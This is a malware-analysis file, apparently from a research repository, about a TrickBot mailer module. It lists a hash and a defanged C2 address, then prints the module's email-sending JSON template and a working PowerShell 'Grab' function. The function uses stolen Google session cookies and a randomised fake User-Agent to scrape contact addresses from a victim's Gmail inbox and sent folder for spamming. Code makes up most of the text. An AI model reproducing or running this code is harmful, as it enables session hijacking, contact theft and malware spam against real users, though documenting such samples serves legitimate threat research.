-
Notifications
You must be signed in to change notification settings - Fork 46
/
Copy path2019-07-08-trickbot-mailer.vk.txt
129 lines (95 loc) · 6.21 KB
/
2019-07-08-trickbot-mailer.vk.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
SHA-256: d96fd330c765b88f3503899755624cbe020ab3e2c53e28d7dee38e7b35f3eab2
C2: C2: 185.86.148[.]63:2050
Example
Content-Disposition: form-data; name="batchJson"
Content-Type: application/json`r`n
{"requests":[{"id":"SaveMessage","uri":"/ws/v3/mailboxes/@.id==$folderId/messages","method":"POST","payloadType":"multipart","payloadParts":[{"partName":"jsonString","contentType":"application/json","payload":{"actions":{"responseMessage":true},"message":{"csid":"$csid","newMessage":true,"headers":{"subject":"$subject","from":[{"name":"$fromName","email":"$mymail"}],"replyTo":[],"to":[$toSingle],"cc":[],"bcc":[$bccArray]},"folder":{"id":"3"},"flags":{"spam":"false","read":"true"}},"simpleBody":{"attachments":[$attachments],"html":"$body"}}}],"filters":{"select":{"messageId":"$..message.immutableid","csid":"$..message.csid","cid":"$..message.conversationId"}},"requests":[{"id":"GetSimpleBody","uri":"/ws/v3/mailboxes/@.id==$folderId/messages/@.id==`$(messageId)/content/simplebody/full/secure","method":"GET","payloadType":"embedded"},{"id":"SendMessage","uri":"/ws/v3/mailboxes/@.id==$folderId/messages/@.id==`$(messageId)/send","method":"POST","payloadType":"embedded","payload":{"csid":"`$(csid)","destinationFolder":{"id":"2"}},"requests":[{"id":"GetMessageGroupList","uri":"/ws/v3/mailboxes/@.id==$folderId/messages/@.select==q?q=%20groupBy%3AconversationId%20count%3A1%20offset%3A0%20conversationId%3A(`$(cid))","method":"GET","payloadType":"embedded"}]}]}],"responseType":"json"}
Grab -> Send -> GetMIMEType
Function Grab {
[cmdletbinding()]
param(
[bool]$collectFromInbox,
[bool]$collectFromOutbox,
[bool]$collectFromAddressBook,
[bool]$collectFromFolders,
[System.Object]$cookies
)
process {
Add-Type -AssemblyName System.Web;
# SID
if (-not $cookies["SID"]) { return Write-Error "Cookie SID not found"; }
# HSID
if (-not $cookies["HSID"]) { return Write-Error "Cookie HSID not found"; }
# SSID
if (-not $cookies["SSID"]) { return Write-Error "Cookie SSID not found"; }
# NID
if (-not $cookies["NID"]) { return Write-Error "Cookie NID not found"; }
# OSID
if (-not $cookies["OSID"]) { return Write-Error "Cookie OSID not found"; }
# get addresses from inbox
$emails = @();
# setup settings
$wc = New-Object system.Net.WebClient;
$wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, (
"SID=" + $cookies["SID"][0] +
"; HSID=" + $cookies["HSID"][0] +
"; SSID=" + $cookies["SSID"][0] +
"; OSID=" + $cookies["OSID"][0] +
"; NID=" + $cookies["NID"][0]));
$wc.Encoding = [System.Text.Encoding]::UTF8;
# FINGER PRINT
$ntVersion = @("3.1", "3.5", "3.51", "4.0", "5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0");
$userAgentFirefox = @("Mozilla/5.0 (Windows NT {0}; rv:{1}.0) Gecko/20100101 Firefox/{1}.0", "Mozilla/5.0 (Windows NT {0}; Win64; x64; rv:{1}.0) Gecko/20100101 Firefox/{1}.0", "Mozilla/5.0 (Windows NT {0}; WOW64; rv:{1}.0) Gecko/20100101 Firefox/{1}.0");
$userAgentChrome = @("Mozilla/5.0 (Windows NT {0}; WOW64) AppleWebKit/{2}.{3} (KHTML, like Gecko) Chrome/{1}.0.3202.94 Safari/{2}.{3}");
$userAgent = @((Get-Random -minimum 0 -maximum 2), (Get-Random -minimum 0 -maximum 3), (Get-Random -minimum 0 -maximum 12));
if ($userAgent[0] -eq 0)
{
$userAgent = [system.string]::format($userAgentFirefox[$userAgent[1]], $ntVersion[$userAgent[2]], (Get-Random -minimum 50 -maximum 66))
} else {
$userAgent = [system.string]::format($userAgentChrome[0], $ntVersion[$userAgent[2]], (Get-Random -minimum 50 -maximum 62), (Get-Random -minimum 500 -maximum 700), (Get-Random -minimum 0 -maximum 100))
}
$wc.Headers.Add("User-Agent", $userAgent);
# ik param for next request
$ik = $wc.downloadString("https://mail.google.com/mail/");
$matches = (New-Object System.Text.RegularExpressions.Regex('var GLOBALS=\[.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,\"(.+?)\",', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($ik);
$mymail = (New-Object System.Text.RegularExpressions.Regex('var GLOBALS=\[.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?,\"(.+?)\",', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($ik);
$mymail = $mymail[0].Groups[1].Value;
$ik = $matches[0].Groups[1].Value;
# debug headers
#For ($i=0; $i -lt $wc.Headers.Count; $i++) {Write-Output($wc.Headers.Keys[$i] + ":" + $wc.Headers[$i])}#: $wc.Headers.Get($i); }
if($collectFromInbox) {
# get inbox mails
$res = $wc.UploadString("https://mail.google.com/mail/?ik=" + $ik + "&view=tl&start=0&num=100000000&rt=c&search=inbox", 'POST');
# parse mails
$matches = (New-Object System.Text.RegularExpressions.Regex('email\\u003d\\\"(.+?)\\\"', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($res);
For ($i=0; $i -lt $matches.Count; $i++) { $emails += $matches[$i].Groups[1].Value; }
}
# get addresses from outbox
if($collectFromOutbox) {
# get inbox outbox mails
$res = $wc.UploadString("https://mail.google.com/mail/?ik=" + $ik + "&view=tl&start=0&num=100000000&rt=c&search=sent", 'POST');
# parse mails
$matches = (New-Object System.Text.RegularExpressions.Regex('email\\u003d\\\"(.+?)\\\"', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($res);
For ($i=0; $i -lt $matches.Count; $i++) { $emails += $matches[$i].Groups[1].Value; }
}
# get addresses from address book
if($collectFromAddressBook) {
# end
}
#get addresses from folders
if($collectFromFolders) {
# end
}
#Remove duplicates
$tmpEms = $emails;
$emails = @();
For ($i=0; $i -lt $tmpEms.Count; $i++) {
$isSet = $false;
For ($l=0; $l -lt $emails.Count; $l++) {
if ($tmpEms[$i] -eq $emails[$l]){ $isSet = $true; }
}
if ($isSet -eq $false -and $tmpEms[$i] -ne $mymail){ $emails += $tmpEms[$i]; }
}
write-output $emails;
}
}